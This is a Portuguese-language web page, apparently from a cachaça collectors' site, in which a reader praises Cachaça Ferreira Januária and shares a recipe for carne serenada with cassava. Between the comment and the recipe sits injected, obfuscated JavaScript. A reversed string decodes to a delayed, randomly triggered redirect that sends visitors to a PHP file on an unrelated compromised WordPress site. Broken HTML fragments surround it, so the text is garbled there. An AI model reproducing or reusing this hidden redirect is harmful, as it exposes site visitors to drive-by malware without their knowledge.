O amigo WALDIR parece gostar de harmonizar sabores, e escolheu a Cachaça Ferreira Januária para combinar um prato:
Eu bebo a Cachaça Ferreira Januária por que conheço o alambique, ela é envelhecida em tonéis de umburana por tres anos e vai bem com carne serenada com madioca. Ummm deu até vontade de tomar uma fui!
WALDIR
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>toscolecao/3638.jpg” alt=”” width=”270″ height=”360″ /><figcaption class=)
Faltou o Waldir enviar esta receita de carne serenada para nós.
Ainda não temos o cadastro da Cachaça Ferreira Januária, mas caso queira mais informações procure-a na coleção do Sr. Messias.
A receita da carne serenada e simples:É conhecida como carne de sol
Tipica do Norte de minas,seu modo de preparo é simples você pica a
carne passe na água para tirar um pouco do sal,a mandioca ou maca
cheira,coloque em uma panela para cozinhar deixe ferver assim que
estiver macia ta pronto,frite a carne e sirva os dois juntos.
Tome um gole da cahaça ferreira aí é só alegia fui!